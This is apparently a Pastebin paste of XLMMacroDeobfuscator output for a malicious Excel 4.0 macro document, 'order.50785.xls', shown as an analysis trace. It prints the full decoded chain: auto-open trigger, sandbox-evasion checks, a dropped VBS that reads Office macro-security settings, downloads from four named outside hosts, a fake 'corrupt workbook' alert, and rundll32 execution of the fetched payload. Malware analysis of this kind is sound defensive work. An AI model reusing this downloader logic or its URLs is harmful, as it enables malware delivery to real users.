Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- xlmdeobfuscator -f C:\Users\user\Downloads\order.50785.xls\order.50785.xls
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\order.50785.xls\order.50785.xls
- Unencrypted xls file
- [Loading Cells]
- auto_open: auto_open->'rtNGOD1P843zMOPdOj'!$CO$18233
- [Starting Deobfuscation]
- CELL:CO18233 , FullEvaluation , FORMULA("=CHAR(R[55791]C[-212])",rtNGOD1P843zMOPdOj$HW$7579:$HW$7659)
- CELL:CO18234 , FullEvaluation , ON.TIME(2020-06-22 11:29:16.856277,'rtNGOD1P843zMOPdOj'!DO18935)
- CELL:DO18935 , FullEvaluation , "=CLOSE(FALSE)"
- CELL:DO18936 , FullEvaluation , "=APP.MAXIMIZE()"
- CELL:DO18937 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R20022C180),)"
- CELL:DO18938 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R20022C180))"
- CELL:DO18939 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R20022C180),)"
- CELL:DO18940 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R20022C180),)"
- CELL:DO18941 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R20022C180),)"
- CELL:DO18942 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R20022C180),)"
- CELL:DO18943 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R20022C180))"
- CELL:DO18944 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R20022C180))"
- CELL:DO18945 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R20022C180))"
- CELL:DO18946 , FullEvaluation , "=""C:\Users\Public\Oyi.vbs"""
- CELL:DO18947 , FullEvaluation , "=""C:\Users\Public\a8FML.txt"""
- CELL:DO18948 , FullEvaluation , "=FOPEN(R20033C180,3)"
- CELL:DO18949 , FullEvaluation , "=FWRITELN(R20035C180,""On Error Resume Next"")"
- CELL:DO18950 , FullEvaluation , "=FWRITELN(R20035C180,""Set fqaeA = CreateObject(""""WScript.Shell"""")"")"
- CELL:DO18951 , FullEvaluation , "=FWRITELN(R20035C180,""Set YtU9AS = CreateObject(""""Scripting.FileSystemObject"""")"")"
- CELL:DO18952 , FullEvaluation , "=FWRITELN(R20035C180,""Set pZ93bgn = YtU9AS.CreateTextFile(""""""&R20034C180&"""""", True)"")"
- CELL:DO18953 , FullEvaluation , "=FWRITELN(R20035C180,""pZ93bgn.WriteLine(fqaeA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
- CELL:DO18954 , FullEvaluation , "=FWRITELN(R20035C180,""pZ93bgn.Close"")"
- CELL:DO18955 , FullEvaluation , "=FCLOSE(R20035C180)"
- CELL:DO18956 , FullEvaluation , "=EXEC(""explorer.exe ""&R20033C180&"""")"
- CELL:DO18957 , FullEvaluation , "=WHILE(ISERROR(FILES(R20034C180)))"
- CELL:DO18958 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
- CELL:DO18959 , FullEvaluation , "=NEXT()"
- CELL:DO18960 , FullEvaluation , "=FILE.DELETE(R20033C180)"
- CELL:DO18961 , FullEvaluation , "=FOPEN(R20034C180,2)"
- CELL:DO18962 , FullEvaluation , "=FREAD(R20048C180,100)"
- CELL:DO18963 , FullEvaluation , "=FCLOSE(R20048C180)"
- CELL:DO18964 , FullEvaluation , "=FILE.DELETE(R20034C180)"
- CELL:DO18965 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R20049C180)),GOTO(R20022C180),)"
- CELL:DO18966 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R37937C135),GOTO(R47050C49))"
- CELL:DO18967 , FullEvaluation , ON.TIME(2020-06-22 11:29:17.058154,'rtNGOD1P843zMOPdOj'!M24795)
- CELL:M24795 , FullEvaluation , FORMULA("=FORMULA(R[-5861]C[106],R[-4774]C[167])",rtNGOD1P843zMOPdOj$M$24796:$M$24827)
- CELL:M24796 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-4774]C[167])
- CELL:M24797 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[-4774]C[167])
- CELL:M24798 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R20022C180),)",R[-4774]C[167])
- CELL:M24799 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R20022C180))",R[-4774]C[167])
- CELL:M24800 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R20022C180),)",R[-4774]C[167])
- CELL:M24801 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R20022C180),)",R[-4774]C[167])
- CELL:M24802 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R20022C180),)",R[-4774]C[167])
- CELL:M24803 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R20022C180),)",R[-4774]C[167])
- CELL:M24804 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R20022C180))",R[-4774]C[167])
- CELL:M24805 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R20022C180))",R[-4774]C[167])
- CELL:M24806 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R20022C180))",R[-4774]C[167])
- CELL:M24807 , FullEvaluation , FORMULA("=""C:\Users\Public\Oyi.vbs""",R[-4774]C[167])
- CELL:M24808 , FullEvaluation , FORMULA("=""C:\Users\Public\a8FML.txt""",R[-4774]C[167])
- CELL:M24809 , FullEvaluation , FORMULA("=FOPEN(R20033C180,3)",R[-4774]C[167])
- CELL:M24810 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""On Error Resume Next"")",R[-4774]C[167])
- CELL:M24811 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""Set fqaeA = CreateObject(""""WScript.Shell"""")"")",R[-4774]C[167])
- CELL:M24812 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""Set YtU9AS = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-4774]C[167])
- CELL:M24813 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""Set pZ93bgn = YtU9AS.CreateTextFile(""""""&R20034C180&"""""", True)"")",R[-4774]C[167])
- CELL:M24814 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""pZ93bgn.WriteLine(fqaeA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-4774]C[167])
- CELL:M24815 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""pZ93bgn.Close"")",R[-4774]C[167])
- CELL:M24816 , FullEvaluation , FORMULA("=FCLOSE(R20035C180)",R[-4774]C[167])
- CELL:M24817 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R20033C180&"""")",R[-4774]C[167])
- CELL:M24818 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R20034C180)))",R[-4774]C[167])
- CELL:M24819 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-4774]C[167])
- CELL:M24820 , FullEvaluation , FORMULA("=NEXT()",R[-4774]C[167])
- CELL:M24821 , FullEvaluation , FORMULA("=FILE.DELETE(R20033C180)",R[-4774]C[167])
- CELL:M24822 , FullEvaluation , FORMULA("=FOPEN(R20034C180,2)",R[-4774]C[167])
- CELL:M24823 , FullEvaluation , FORMULA("=FREAD(R20048C180,100)",R[-4774]C[167])
- CELL:M24824 , FullEvaluation , FORMULA("=FCLOSE(R20048C180)",R[-4774]C[167])
- CELL:M24825 , FullEvaluation , FORMULA("=FILE.DELETE(R20034C180)",R[-4774]C[167])
- CELL:M24826 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R20049C180)),GOTO(R20022C180),)",R[-4774]C[167])
- CELL:M24827 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R37937C135),GOTO(R47050C49))",R[-4774]C[167])
- CELL:M24828 , FullEvaluation , ON.TIME(2020-06-22 11:29:17.077142,'rtNGOD1P843zMOPdOj'!FX20023)
- CELL:FX20023 , PartialEvaluation , APP.MAXIMIZE()
- CELL:FX20024 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R20022C180),)
- CELL:FX20025 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R20022C180))
- CELL:FX20026 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R20022C180),)
- CELL:FX20027 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R20022C180),)
- CELL:FX20028 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R20022C180),)
- CELL:FX20029 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R20022C180),)
- CELL:FX20030 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R20022C180))
- CELL:FX20031 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R20022C180))
- CELL:FX20032 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R20022C180))
- CELL:FX20032 , FullEvaluation , [TRUE]
- CELL:FX20033 , FullEvaluation , "C:\Users\Public\Oyi.vbs"
- CELL:FX20034 , FullEvaluation , "C:\Users\Public\a8FML.txt"
- CELL:FX20035 , FullEvaluation , FOPEN("C:\Users\Public\Oyi.vbs",3)
- CELL:FX20036 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","On Error Resume Next")
- CELL:FX20037 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","Set fqaeA = CreateObject(""WScript.Shell"")")
- CELL:FX20038 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","Set YtU9AS = CreateObject(""Scripting.FileSystemObject"")")
- CELL:FX20039 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","Set pZ93bgn = YtU9AS.CreateTextFile(""C:\Users\Public\a8FML.txt"", True)")
- CELL:FX20040 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","pZ93bgn.WriteLine(fqaeA.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
- CELL:FX20041 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","pZ93bgn.Close")
- CELL:FX20042 , PartialEvaluation , FCLOSE("C:\Users\Public\Oyi.vbs")
- CELL:FX20043 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\Oyi.vbs")
- CELL:FX20044 , PartialEvaluation , WHILE(ISERROR(FILES(R20034C180)))
- CELL:FX20047 , PartialEvaluation , FILE.DELETE("C:\Users\Public\Oyi.vbs")
- CELL:FX20048 , FullEvaluation , FOPEN("C:\Users\Public\a8FML.txt",2)
- CELL:FX20049 , PartialEvaluation , FREAD("C:\Users\Public\a8FML.txt",100)
- CELL:FX20050 , PartialEvaluation , FCLOSE("C:\Users\Public\a8FML.txt")
- CELL:FX20051 , PartialEvaluation , FILE.DELETE("C:\Users\Public\a8FML.txt")
- CELL:FX20052 , FullBranching , IF(ISNUMBER(SEARCH("1",R20049C180)),GOTO(R20022C180),)
- CELL:FX20052 , FullEvaluation , [TRUE] GOTO(R20022C180)
- CELL:FX20022 , End , CLOSE(FALSE)
- CELL:FX20052 , FullEvaluation , [FALSE]
- CELL:FX20053 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R37937C135),GOTO(R47050C49))
- CELL:FX20053 , FullEvaluation , [TRUE] GOTO(R37937C135)
- CELL:EE37937 , FullEvaluation , "=""C:\Users\Public\aB3WzTL.html"""
- CELL:EE37938 , FullEvaluation , "=""https://thepsaokhue.com/wp-keys.php"""
- CELL:EE37939 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13914C238,R13913C238,0,0)"
- CELL:EE37940 , FullEvaluation , "=FILES(R13913C238)"
- CELL:EE37941 , FullEvaluation , "=IF(ISERROR(R13916C238),GOTO(R13923C238),)"
- CELL:EE37942 , FullEvaluation , "=FOPEN(R13913C238)"
- CELL:EE37943 , FullEvaluation , "=FSIZE(R13918C238)"
- CELL:EE37944 , FullEvaluation , "=FCLOSE(R13918C238)"
- CELL:EE37945 , FullEvaluation , "=IF(R13919C238<40000,,GOTO(R13940C238))"
- CELL:EE37946 , FullEvaluation , "=""https://metagro.com.br/wp-keys.php"""
- CELL:EE37947 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13922C238,R13913C238,0,0)"
- CELL:EE37948 , FullEvaluation , "=FILES(R13913C238)"
- CELL:EE37949 , FullEvaluation , "=IF(ISERROR(R13924C238),GOTO(R13931C238),)"
- CELL:EE37950 , FullEvaluation , "=FOPEN(R13913C238)"
- CELL:EE37951 , FullEvaluation , "=FSIZE(R13926C238)"
- CELL:EE37952 , FullEvaluation , "=FCLOSE(R13926C238)"
- CELL:EE37953 , FullEvaluation , "=IF(R13927C238<40000,,GOTO(R13940C238))"
- CELL:EE37954 , FullEvaluation , "=""https://loughturnperceidrin.ml/wp-keys.php"""
- CELL:EE37955 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13930C238,R13913C238,0,0)"
- CELL:EE37956 , FullEvaluation , "=FILES(R13913C238)"
- CELL:EE37957 , FullEvaluation , "=IF(ISERROR(R13932C238),GOTO(R13939C238),)"
- CELL:EE37958 , FullEvaluation , "=FOPEN(R13913C238)"
- CELL:EE37959 , FullEvaluation , "=FSIZE(R13934C238)"
- CELL:EE37960 , FullEvaluation , "=FCLOSE(R13934C238)"
- CELL:EE37961 , FullEvaluation , "=IF(R13935C238<40000,,GOTO(R13940C238))"
- CELL:EE37962 , FullEvaluation , "=""https://joliroomlides.tk/wp-keys.php"""
- CELL:EE37963 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13938C238,R13913C238,0,0)"
- CELL:EE37964 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
- CELL:EE37965 , FullEvaluation , "=ALERT(R13940C238)"
- CELL:EE37966 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
- CELL:EE37967 , FullEvaluation , "=R13913C238&"",DllRegisterServer"""
- CELL:EE37968 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R13942C238,R13943C238,0,5)"
- CELL:EE37969 , FullEvaluation , "=GOTO(R20022C180)"
- CELL:EE37970 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.115500,'rtNGOD1P843zMOPdOj'!D4644)
- CELL:D4644 , FullEvaluation , FORMULA("=FORMULA(R[33292]C[131],R[9268]C[234])",rtNGOD1P843zMOPdOj$D$4645:$D$4677)
- CELL:D4645 , FullEvaluation , FORMULA("=""C:\Users\Public\aB3WzTL.html""",R[9268]C[234])
- CELL:D4646 , FullEvaluation , FORMULA("=""https://thepsaokhue.com/wp-keys.php""",R[9268]C[234])
- CELL:D4647 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13914C238,R13913C238,0,0)",R[9268]C[234])
- CELL:D4648 , FullEvaluation , FORMULA("=FILES(R13913C238)",R[9268]C[234])
- CELL:D4649 , FullEvaluation , FORMULA("=IF(ISERROR(R13916C238),GOTO(R13923C238),)",R[9268]C[234])
- CELL:D4650 , FullEvaluation , FORMULA("=FOPEN(R13913C238)",R[9268]C[234])
- CELL:D4651 , FullEvaluation , FORMULA("=FSIZE(R13918C238)",R[9268]C[234])
- CELL:D4652 , FullEvaluation , FORMULA("=FCLOSE(R13918C238)",R[9268]C[234])
- CELL:D4653 , FullEvaluation , FORMULA("=IF(R13919C238<40000,,GOTO(R13940C238))",R[9268]C[234])
- CELL:D4654 , FullEvaluation , FORMULA("=""https://metagro.com.br/wp-keys.php""",R[9268]C[234])
- CELL:D4655 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13922C238,R13913C238,0,0)",R[9268]C[234])
- CELL:D4656 , FullEvaluation , FORMULA("=FILES(R13913C238)",R[9268]C[234])
- CELL:D4657 , FullEvaluation , FORMULA("=IF(ISERROR(R13924C238),GOTO(R13931C238),)",R[9268]C[234])
- CELL:D4658 , FullEvaluation , FORMULA("=FOPEN(R13913C238)",R[9268]C[234])
- CELL:D4659 , FullEvaluation , FORMULA("=FSIZE(R13926C238)",R[9268]C[234])
- CELL:D4660 , FullEvaluation , FORMULA("=FCLOSE(R13926C238)",R[9268]C[234])
- CELL:D4661 , FullEvaluation , FORMULA("=IF(R13927C238<40000,,GOTO(R13940C238))",R[9268]C[234])
- CELL:D4662 , FullEvaluation , FORMULA("=""https://loughturnperceidrin.ml/wp-keys.php""",R[9268]C[234])
- CELL:D4663 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13930C238,R13913C238,0,0)",R[9268]C[234])
- CELL:D4664 , FullEvaluation , FORMULA("=FILES(R13913C238)",R[9268]C[234])
- CELL:D4665 , FullEvaluation , FORMULA("=IF(ISERROR(R13932C238),GOTO(R13939C238),)",R[9268]C[234])
- CELL:D4666 , FullEvaluation , FORMULA("=FOPEN(R13913C238)",R[9268]C[234])
- CELL:D4667 , FullEvaluation , FORMULA("=FSIZE(R13934C238)",R[9268]C[234])
- CELL:D4668 , FullEvaluation , FORMULA("=FCLOSE(R13934C238)",R[9268]C[234])
- CELL:D4669 , FullEvaluation , FORMULA("=IF(R13935C238<40000,,GOTO(R13940C238))",R[9268]C[234])
- CELL:D4670 , FullEvaluation , FORMULA("=""https://joliroomlides.tk/wp-keys.php""",R[9268]C[234])
- CELL:D4671 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13938C238,R13913C238,0,0)",R[9268]C[234])
- CELL:D4672 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[9268]C[234])
- CELL:D4673 , FullEvaluation , FORMULA("=ALERT(R13940C238)",R[9268]C[234])
- CELL:D4674 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[9268]C[234])
- CELL:D4675 , FullEvaluation , FORMULA("=R13913C238&"",DllRegisterServer""",R[9268]C[234])
- CELL:D4676 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R13942C238,R13943C238,0,5)",R[9268]C[234])
- CELL:D4677 , FullEvaluation , FORMULA("=GOTO(R20022C180)",R[9268]C[234])
- CELL:D4678 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.126493,'rtNGOD1P843zMOPdOj'!ID13913)
- CELL:ID13913 , FullEvaluation , "C:\Users\Public\aB3WzTL.html"
- CELL:ID13914 , FullEvaluation , "https://thepsaokhue.com/wp-keys.php"
- CELL:ID13915 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://thepsaokhue.com/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13916 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
- CELL:ID13917 , FullBranching , IF(ISERROR(R13916C238),GOTO(R13923C238),)
- CELL:ID13917 , FullEvaluation , [TRUE] GOTO(R13923C238)
- CELL:ID13923 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://metagro.com.br/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13924 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
- CELL:ID13925 , FullBranching , IF(ISERROR(R13924C238),GOTO(R13931C238),)
- CELL:ID13925 , FullEvaluation , [TRUE] GOTO(R13931C238)
- CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
- CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
- CELL:ID13933 , FullEvaluation , [TRUE] GOTO(R13939C238)
- CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:ID13942 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:ID13943 , FullEvaluation , "C:\Users\Public\aB3WzTL.html,DllRegisterServer"
- CELL:ID13944 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\aB3WzTL.html,DllRegisterServer",0,5)
- CELL:ID13945 , FullEvaluation , GOTO(R20022C180)
- CELL:FX20022 , End , CLOSE(FALSE)
- CELL:ID13933 , FullEvaluation , [FALSE]
- CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
- CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
- CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
- CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:ID13942 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:ID13943 , FullEvaluation , "C:\Users\Public\aB3WzTL.html,DllRegisterServer"
- CELL:ID13944 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\aB3WzTL.html,DllRegisterServer",0,5)
- CELL:ID13945 , FullEvaluation , GOTO(R20022C180)
- CELL:FX20022 , End , CLOSE(FALSE)
- CELL:ID13925 , FullEvaluation , [FALSE]
- CELL:ID13926 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
- CELL:ID13927 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13928 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13929 , FullEvaluation , IF(R13927C238<40000,,GOTO(R13940C238))
- CELL:ID13930 , FullEvaluation , "https://loughturnperceidrin.ml/wp-keys.php"
- CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
- CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
- CELL:ID13933 , FullEvaluation , [TRUE] GOTO(R13939C238)
- CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:ID13942 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:ID13943 , FullEvaluation , "C:\Users\Public\aB3WzTL.html,DllRegisterServer"
- CELL:ID13933 , FullEvaluation , [FALSE]
- CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
- CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
- CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
- CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:ID13917 , FullEvaluation , [FALSE]
- CELL:ID13918 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
- CELL:ID13919 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13920 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13921 , FullEvaluation , IF(R13919C238<40000,,GOTO(R13940C238))
- CELL:ID13922 , FullEvaluation , "https://metagro.com.br/wp-keys.php"
- CELL:ID13923 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://metagro.com.br/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13924 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
- CELL:ID13925 , FullBranching , IF(ISERROR(R13924C238),GOTO(R13931C238),)
- CELL:ID13925 , FullEvaluation , [TRUE] GOTO(R13931C238)
- CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
- CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
- CELL:ID13933 , FullEvaluation , [TRUE] GOTO(R13939C238)
- CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13933 , FullEvaluation , [FALSE]
- CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
- CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
- CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
- CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:ID13925 , FullEvaluation , [FALSE]
- CELL:ID13926 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
- CELL:ID13927 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13928 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13929 , FullEvaluation , IF(R13927C238<40000,,GOTO(R13940C238))
- CELL:ID13930 , FullEvaluation , "https://loughturnperceidrin.ml/wp-keys.php"
- CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
- CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
